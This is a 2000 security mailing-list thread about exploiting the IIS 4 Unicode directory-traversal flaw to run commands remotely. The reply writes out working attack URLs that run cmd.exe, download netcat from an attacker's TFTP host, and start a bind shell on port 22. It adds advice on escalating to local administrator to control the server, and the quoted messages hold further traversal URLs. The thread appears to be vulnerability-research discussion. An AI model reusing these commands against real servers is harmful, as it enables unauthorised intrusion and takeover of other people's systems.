Re: dos commands via iis 4 (TFTP)

[MadHat <madhat () UNSPECIFIC COM>]

"Loschiavo, Dave" wrote:
> Thanks, looks like I inadvertantly left the "get" out of the message. I was
> including that in the URL when testing. However, what I did notice was the
> use of the quotes in the "-i" area of the URL. I was not using quotes. Will
> have to give that a shot.

shouldn't need the quotes, but you probably do want to tell the tftp
where to put the file.  When I tested this, I placed the nc.exe in the
scripts dir,
http://.../scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp+-i+<IPADDR>+get+nc.exe+c:\inetpub\scripts\nc.exe

then used
http://.../scripts/..%c0%af../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\nc.exe+-l+-p+22+-t+-e+cmd.exe

Unicode was still used as the scripts is usually set as script access
only and not execute, if there is a cgi-bin dir with execute access this
can make it alot easier for someone to abuse.  If called from IE, I
found that the \ don't need to be excaped, but may need to be in
netscape.

So after this, there is a port open (22 in this case as many admins will
leave this open for SSH, but this is an NT box, which as we know rarely
has SSH running on it) that I can telnet to and have a command prompt.
There are plenty of ways of doing this...  once on the box, use one of
the exploits to get IUSER_<MACHINE>, which is who you will be, added to
the local admin group, and you control the box.

Basic idea for the msadc as well, or any exploit that allows for simple
remote command execution.

> -thanks
>
> -----Original Message-----
> From: Robert A. Seace
> To: DLoschiavo () frcc cc ca us
> Cc: VULN-DEV () SECURITYFOCUS COM
> Sent: 11/10/00 10:11 AM
> Subject: Re: dos commands via iis 4 (TFTP)
>
> In the profound words of Loschiavo, Dave:
> > I tried tftp commands in the URL, formatted like this:
> http://192/168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system
> 32/c
> > md.exe?/tftp+-i+192.168.1.20+nc.exe"
> >
> > and got nowhere, while this:
> http://192.168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system
> 32/c
> > md.exe?/c+dir+c: gave me a listing of the of the c: drive.
> >
> > Am I formatting the "TFTP" URL incorrectly?
>
>         Yeah, I think so...  But, I'm no TFTP guru, either...
> Personally, I would just use RCP...
>
>         However, looking at the original advisory on BugTraq, that
> mentioned using TFTP ("http://www.securityfocus.com/archive/1/141048";),
> I think you need a "GET" before the "nc.exe", and maybe a destination
> location specified after it, for where to place it on the NT box...
> For instance, it shows an URL of:
>
> /[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"+xxx.xxx.xxx.xxx+GET+n
> cx99.exe+c:\winnt\system32\ncx99.exe

--
MadHat at unspecific.com
                                   "The 3 great virtues of a programmer:
                                      Laziness, Impatience, and Hubris."
                                                 --Larry Wall